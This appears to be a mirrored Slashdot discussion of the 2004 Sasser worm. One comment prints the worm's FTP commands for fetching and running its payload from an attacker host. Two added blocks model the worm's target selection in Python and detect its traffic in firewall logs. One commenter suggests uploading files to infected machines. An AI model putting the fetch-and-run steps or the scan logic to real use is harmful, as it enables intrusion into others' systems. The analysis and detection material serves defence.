Slashdot Mirror


New Windows Worm on the Loose

Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."

36 of 622 comments

  1. ah... by Anonymous Coward · · Score: 5, Funny

    the luxury of being behind a nat box with all ports off and not having to deal with such nonsense

    1. Re:ah... by Interruach · · Score: 5, Funny

      ahh, the luxury of the first box after the NAT being a linux proxy server that serves my entire internal network.

      -- I see your nat box and raise you a proxy server.

    2. Re:ah... by Anonymous Coward · · Score: 5, Insightful
      the luxury of being behind a nat box with all ports off and not having to deal with such nonsense

      Yeah... till your buddy comes over to play Counterstrike and plugs into your hub infecting your machine.

    3. Re:ah... by Lord+Kano · · Score: 5, Funny

      Pussies! I'm whistling into a telephone receiver.

      LK

      --
      "Hi. This is my friend, Jack Shit, and you don't know him." - Lord Kano
    4. Re:ah... by JPriest · · Score: 5, Interesting

      1990, the year someone said it was a bad idea to have default services in listening state.
      1999, the year MS forgot what was said back in 90.
      2003, the year of Microsoft's new security initiative.
      2004, the year of the Windows worms.
      XP SP2, the patch for mentioned "listening state" error.

      --
      Saying Java is nice because it works on all OS's is like saying that anal sex is nice because it works on all genders.
  2. I Use X Windows by craXORjack · · Score: 5, Funny
    Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?

    What is this 'Windows Update' of which you speak?

    --
    Liberals call everyone Nazis yet they are the closest thing to it.
    1. Re:I Use X Windows by temojen · · Score: 5, Funny

      I believe it's a kludgy Microsoft variant of

      "emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"

      except that it requires you to reboot several times and repeatedly interact with it.

    2. Re:I Use X Windows by bamf · · Score: 5, Informative

      You've probably already installed it, just look for KB835732 in your list of installed updates.

    3. Re:I Use X Windows by SpectreGadget · · Score: 5, Insightful

      oh yes:

      "emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"

      isn't kludgy in the least and very intuitive. I prefer "apt-get dist-upgrade" myself.

      --
      Jim Harry
    4. Re:I Use X Windows by Anonymous Coward · · Score: 5, Funny
      You must be running a Microsoft Windows operating system in order to use Windows Update.

      Those monopolistic bastards.

    5. Re:I Use X Windows by brunson · · Score: 5, Funny

      It's kinda like:

      yum --ask-lots-of-useless-questions=yes \
      --reboot-for-no-apparent-reason=alot \
      --resolve-dependencies-without-my-help=no \
      update

      --
      09F911029D74E35BD84156C5635688C0
      Jesus loves you, I think you suck
  3. Mutex Trapping by Mr.+Darl+McBride · · Score: 5, Interesting
    About the first thing any Windows program does is to attempt to acquire a mutex to see if the program is already running. In the case of this worm, that's "Jobaka3l." If that exists, the worm dies off without running.

    Mutexes are named consistently enough under Windows that I wish somebody would make a program that simply caught all attempts at gaining a mutex and popped up a dialog window if the mutex hadn't been seen before. This would stop most any new software from running without first checking with the user. This is no good for a server of course, but ideal for a workstation.

    This would also be great for catching spyware crap installs, as well as things like the RealPlayer toolbar that keeps popping up adverts by default. Simply tell the mutex checker to decline the requested mutex from then on and it would have the mutex always fail from then on -- then those programs could never be run again.

    1. Re:Mutex Trapping by Anonymous Coward · · Score: 5, Informative

      You can set permissions in the registry per key.

      Make it impossible to write to HKLM/software/microsoft/windows/currentversion/run

    2. Re:Mutex Trapping by stef0x77 · · Score: 5, Informative

      Use regedt32.exe (which is an older incarnation of regedit), go to the key in question, choose Security | Permissions ... from the menu etc...

    3. Re:Mutex Trapping by kyhwana · · Score: 5, Informative

      Err, Startup Monitor does just that.
      Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..

      --
      My email addy? should be easy enough.
    4. Re:Mutex Trapping by Foolhardy · · Score: 5, Informative

      You can also enable auditing that will record attempts to access keys you want to watch in the same dialog (see Advanced->Auditing). But first, you have to enable the auditing policy: in the control panel, go to Administrative Tools->Local Security Policy. Then Local Policies->Audit Policy. Registry keys are considered objects.
      Access attempts will show up in the event viewer.
      Note: use regedt32.exe for Win2000 or earlier. For later versions, regedit.exe does everything (under Edit->Permissions).

  4. Huh? by grub · · Score: 5, Funny

    A new worm?
    May 01 07:59:49.306654 rule 0/0(match): block in on dc0: xx.xx.xx.xx:xxxx > yy.yy.yy.yy:yyyy: S 2881286568:2881286568(0) win 32640 (DF)
    Oh, there it is.
    --
    Trolling is a art,
  5. Removal Instructions by modifried · · Score: 5, Informative

    For anyone already infected, Microsoft has manual removal instructions for the worm, located here:

    http://www.microsoft.com/security/incident/sasser.asp

  6. ah Nice, more work =) by Quazion · · Score: 5, Funny

    At least for me as the local consumer support guy.

    Thanks Microsoft.

  7. HAHA by D-Cypell · · Score: 5, Funny

    A smile crept across my face after reading this story and then noticing a microsoft ad underneath informing the reader that Windows Server cost of ownership is lower than Linux cost of ownership!

    The ad server must be based on Microsoft's new Irony.NET framework!

    1. Re:HAHA by Lothsahn · · Score: 5, Insightful

      Actually, current viruses are real malware, especially the ones that try to shut down virus scanners.

      They cause the computer to run really slowly and screw things up, including networking settings, killing IE, destroying the cryptography service, so that you can't get updates, and the ability to repair the TCP/IP layer.

      When you get multiple viruses on a machine, they can cause it to not even startup--Especially the ones that try to shut down virus scanners (Gaobot).

      I know they're not malware in the sense that they format your HD or anything, but when your server runs at 10% of its normal speed, that's enough to take down almost any operation.

      --
      -=Lothsahn=-
    2. Re:HAHA by Anonymous Coward · · Score: 5, Funny

      but the fact is windows server cost of ownership IS lower because you don't need a smart person to run it.

      And that, your honour, concludes my evidence showing why the Internet is such an insecure mess.

  8. Visit Windows Update? by Anonymous Coward · · Score: 5, Funny

    No need, I receive all the Windows critical updates by email. I don't know how I got subscribed to that mailing list, but it's damn convenient.

  9. Security Update Dates by TheUnFounded · · Score: 5, Insightful

    You know, normally these updates are available a good 3 or 4 months before the worm becomes available. This one was updated about 3 days ago. And MS claims to be beefing up their security efforts. ...

  10. YA Windows-only software title by Anonymous Coward · · Score: 5, Funny

    In light of this, would someone please explain why I would ever want a Mac? None of the really good viruses or worms are ever ported to it, no matter how successful they are!

  11. Loose not lose by Brian+Dennehy · · Score: 5, Funny

    I'm impressed that they got the headline right!

  12. How it works by mrneutron · · Score: 5, Informative
    It infects a 2000 or XP box via the LSASS (MS04-011) exploit, and opens a shell on port 9996.

    It then connects to that shell, and executes the following commands (cleaned up to get past Slashdot's junk filter):

    open XXX.XXX.XXX.XXX 5554
    anonymous
    user
    bin
    get XXXXX_up.exe
    bye
    XXXXX_up.exe

    If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from Symantec:

    The IP addresses generated by the worm are distributed as follows:

    50% are completely random
    25% have the same first octet as the IP address of the infected host
    25% have the same first and second octet as the IP address of the infected host.

    The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.

    See:

    • http://securityresponse.symantec.com/avcenter/venc/data/w32.sasser.worm.html
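The Symantec target-selection rule quoted in the post above, written out as a small Python model so the locality of the scan can be measured. This is an added example, not the worm's code and not Symantec's: it only reproduces the documented 50/25/25 split with a seeded generator. The host address 10.20.30.40, the sample size and the function names are constructed for the illustration.

```python
import random

# Added example, not worm code: reproduces the Symantec-documented split
# (50% fully random, 25% same first octet, 25% same first two octets) so
# the locality of the scan can be measured. Assumed host: 10.20.30.40.


def pick_target(host_ip, rng):
    """One scan target for an infected host at host_ip, drawn with rng."""
    host = [int(o) for o in host_ip.split(".")]
    bucket = rng.randrange(4)     # 0,1: fully random; 2: keep /8; 3: keep /16
    if bucket == 3:
        keep = 2                  # same first and second octet (25%)
    elif bucket == 2:
        keep = 1                  # same first octet (25%)
    else:
        keep = 0                  # completely random (50%)
    octets = host[:keep] + [rng.randrange(256) for _ in range(4 - keep)]
    return ".".join(str(o) for o in octets)


def sample_targets(host_ip, n, seed=1):
    """n targets from a seeded generator, so runs are reproducible."""
    rng = random.Random(seed)
    return [pick_target(host_ip, rng) for _ in range(n)]


def locality(host_ip, n, seed=1):
    """Fraction of n targets that land inside the host's own /8 and /16."""
    h = host_ip.split(".")
    same8 = same16 = 0
    for t in sample_targets(host_ip, n, seed):
        o = t.split(".")
        if o[0] == h[0]:
            same8 += 1
            if o[1] == h[1]:
                same16 += 1
    return {"same_slash8": same8 / n, "same_slash16": same16 / n}


if __name__ == "__main__":
    r = locality("10.20.30.40", 40000, seed=7)
    # A uniform scanner lands in any given /16 about once in 65,536 probes.
    print(r, "vs uniform /16 rate", 1 / 65536)
```

Measured this way, roughly half of every infected host's probes stay inside its own /8 and roughly a quarter inside its own /16, against 1 in 65,536 for a uniform scanner. That is why one infected neighbour on the same ISP block shows up as a steady stream on port 445 long before the Internet at large does.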
  13. Help the poor bastards by nazsco · · Score: 5, Funny

    The worm seems to install an FTP server on infected machines. So, wouldn't it be nice to have every box that detects a connection on port 554 reply with an upload of a new wallpaper to the infected windows box with some message like "install a firewall, moron"

    I consider it a public service. Maybe you can even deduct the bandwidth for the upload from your tax.

  14. Days like this... by C0rinthian · · Score: 5, Funny

    I REALLY hate working dial-up tech support.
    (ring)
    sigh....

  15. Windows update freaking out! by nazsco · · Score: 5, Funny

    after reading this on the /. front page, I ran Windows Update, which I hadn't visited for more than a year...

    and after some time, a window pops up with the text:
    "The software you are installing has not passed the Windows Logo testing to verify its compatibility with Windows XP. bla bla bla"
    "This software will *not be installed*. Contact your system administrator."

    Ok, so I contact myself, and wonder what the hell?!?

    I just gave M$ a lot of information about the operating system that I'm running... they wrote the friggin' thing, and even so, they don't know what will run on it, or what will pass their own crap compatibility verification!

    but well, that's it... I just click "OK" --the only button-- and see the same window appear 3 times more... and blissfully keep my ignorance of what's going on with the installation.

  16. You must be an american by empaler · · Score: 5, Funny

    Only consumer whores and other types of idiots choose to toss out the computer instead of just wiping the hard drive and installing something else.

  17. Well done, submitter! by 6Yankee · · Score: 5, Funny

    How refreshing. A Slashdot article about a worm exploiting Windows, without the usual childish jibes. Or FUD. Or spelling mistakes. Well done, Dynamoo!

    Of course, then came the comments... :-)

  18. I was wondering... by lazy_arabica · · Score: 5, Funny

    ... if we replaced the posts of this thread with the messages posted after a previous worm-announcement, would anyone notice ? :)

    Linux_Zealot says : 5 Insightful - I am using Linux now !
    M$_wizard : 5 Interesting - Worms always appear after a security notice from Microsoft Knowledge Base ; so, openness is bad !
    security_Teacher : 5 Insightful - Of course, no one should run anything as root but critical administration tasks, and a firewall is essential.
    n00b : -1 Troll - Windows Sucks !!!

    Well... That's just a little... repetitive ;-)

    1. Re:I was wondering... by kasperd · · Score: 5, Interesting

      a firewall is essential.

      It sure is. The last worm wouldn't have worked without one.

      --

      Do you care about the security of your wireless mouse?
  19. This totally sucks. by mark-t · · Score: 5, Interesting
    I was never in any danger of being infected by this worm, but about 3 days ago, I noticed I was getting almost a steady stream of traffic on my LAN when nobody was using any computers... A quick check with Ethereal showed that it was all port 445 stuff, and I was getting as many as 10 packets every second coming from various IP addresses.

    So for the past few days, I've had to live with part of my bandwidth getting chewed up by incoming packets that don't actually do anything but take up space. It effectively slowed the speed of downloads by about half. The rate of packets is starting to slow down now... finally (I guess as people patch their systems), but it still was highly annoying.

    Anyways, I called my ISP when I first noticed it 3 days ago (after checking it with Ethereal), and asked if they could help. They told me that this was caused by filesharing programs, which I knew wasn't the case because in fact the only port 445 stuff I've done is Windows filesharing, and I've secured the one and only Windows system on my LAN so that no IP address other than the ones on my LAN can access it. Needless to say, this answer did not impress me. Here I was, effectively being subjected to a DoS attack, and they are trying to tell me this is _my_ fault? Man, if I had any other choice for high speed internet, I'd be switching in a heartbeat.

    Anyways, that's my story. Things like this totally bite because you can have a firewall and all the security precautions in the world, but worms like this still chew up your bandwidth.
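The infection sequence in the "How it works" post (inbound exploit on port 445, shell on 9996, outbound FTP fetch from the attacker on 5554) and the steady port 445 scanning the post above saw with Ethereal can both be picked out of a pf log of the kind shown in the "Huh?" post. What follows is an added example, not from any of the commenters: a parser for that log format and a detector run over a handful of constructed log lines. The LAN range 192.0.2.0/24, the addresses, the interface name and the five-target threshold are assumptions made for the illustration.

```python
import re
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network

# Assumed for this example: the protected LAN is 192.0.2.0/24 (a documentation
# range) and pf logs in the tcpdump-style format seen in the "Huh?" post.
LAN = ip_network("192.0.2.0/24")

# One pflog line: timestamp, rule, action, direction, interface, 5-tuple, TCP flags.
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{2} \d{2}:\d{2}:\d{2}\.\d{6}) rule [^:]+: "
    r"(?P<action>block|pass) (?P<dir>in|out) on (?P<iface>\w+): "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+) > "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d+): (?P<flags>[A-Z.]+)"
)


def parse_line(line):
    """Return a dict for a pflog TCP line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # pf omits the year; strptime defaults to 1900, which is fine for deltas.
    rec["ts"] = datetime.strptime(rec["ts"], "%b %d %H:%M:%S.%f")
    rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
    rec["syn"] = "S" in rec["flags"]          # connection attempts only
    return rec


def analyse(lines, min_targets=5):
    """Flag Sasser-shaped activity. Three signals, per the worm description:
    an outside host SYN-scanning many LAN hosts on 445, anyone connecting
    to a LAN host on 9996 (the worm's shell), and a LAN host connecting
    out to 5554 (pulling the payload from the attacker's FTP server)."""
    hits445 = defaultdict(set)     # external src -> LAN hosts it probed on 445
    stamps = defaultdict(list)     # external src -> SYN timestamps on 445
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["syn"]:
            continue
        src, dst = ip_address(rec["src"]), ip_address(rec["dst"])
        if rec["dport"] == 445 and src not in LAN and dst in LAN:
            hits445[rec["src"]].add(rec["dst"])
            stamps[rec["src"]].append(rec["ts"])
        elif rec["dport"] == 9996 and dst in LAN:
            findings.append({"kind": "shell-connect", "src": rec["src"], "dst": rec["dst"]})
        elif rec["dport"] == 5554 and src in LAN and dst not in LAN:
            findings.append({"kind": "payload-fetch", "src": rec["src"], "dst": rec["dst"]})
    for src, targets in hits445.items():
        if len(targets) >= min_targets:
            ts = stamps[src]
            span = (max(ts) - min(ts)).total_seconds() or 1.0
            findings.append({"kind": "scanner-445", "src": src,
                             "targets": len(targets), "pps": round(len(ts) / span, 1)})
    return findings


# Constructed sample log: one scanner sweeping six LAN hosts in half a second,
# one stray single probe, the shell connect and payload fetch that follow a
# successful exploit, and two unrelated lines that must be ignored.
SAMPLE_LOG = [
    "May 01 07:59:49.306654 rule 0/0(match): block in on dc0: 198.51.100.7:3450 > 192.0.2.10:445: S 2881286568:2881286568(0) win 32640 (DF)",
    "May 01 07:59:49.406654 rule 0/0(match): block in on dc0: 198.51.100.7:3451 > 192.0.2.11:445: S 2881286569:2881286569(0) win 32640 (DF)",
    "May 01 07:59:49.506654 rule 0/0(match): block in on dc0: 198.51.100.7:3452 > 192.0.2.12:445: S 2881286570:2881286570(0) win 32640 (DF)",
    "May 01 07:59:49.606654 rule 0/0(match): block in on dc0: 198.51.100.7:3453 > 192.0.2.13:445: S 2881286571:2881286571(0) win 32640 (DF)",
    "May 01 07:59:49.706654 rule 0/0(match): block in on dc0: 198.51.100.7:3454 > 192.0.2.14:445: S 2881286572:2881286572(0) win 32640 (DF)",
    "May 01 07:59:49.806654 rule 0/0(match): block in on dc0: 198.51.100.7:3455 > 192.0.2.15:445: S 2881286573:2881286573(0) win 32640 (DF)",
    "May 01 07:59:49.900000 rule 0/0(match): block in on dc0: 203.0.113.9:1234 > 192.0.2.20:445: S 1122334455:1122334455(0) win 16384 (DF)",
    "May 01 07:59:50.100000 rule 3/0(match): pass in on dc0: 198.51.100.7:3460 > 192.0.2.10:9996: S 2881286600:2881286600(0) win 32640 (DF)",
    "May 01 07:59:50.400000 rule 3/0(match): pass out on dc0: 192.0.2.10:1033 > 198.51.100.7:5554: S 99887766:99887766(0) win 65535 (DF)",
    "May 01 07:59:50.500000 rule 3/0(match): pass in on dc0: 203.0.113.9:2222 > 192.0.2.50:445: P 1:10(9) ack 1 win 32640",
    "May 01 07:59:50.600000 rule 0/0(match): block in on dc0: 203.0.113.9:1111 > 192.0.2.50:80: S 5544332211:5544332211(0) win 16384 (DF)",
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

The scanner threshold is on distinct LAN targets rather than raw packet count, so a single legitimate SMB client retrying against one file server never trips it, while a worm walking the subnet does within a second. The payload-fetch check is the higher-confidence signal: a workstation opening an outbound connection to port 5554 on an outside host has very little innocent explanation.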

  20. Re:Removal Instructions [mirrors] by AvantLegion · · Score: 5, Funny
    Here's a few mirrors for those removal instructions, in case the rash of post-bug traffic slows things down:

    http://fedora.redhat.com
    http://www.gentoo.org
    http://www.debian.org
    http://www.linux-mandrake.com
    http://www.slackware.com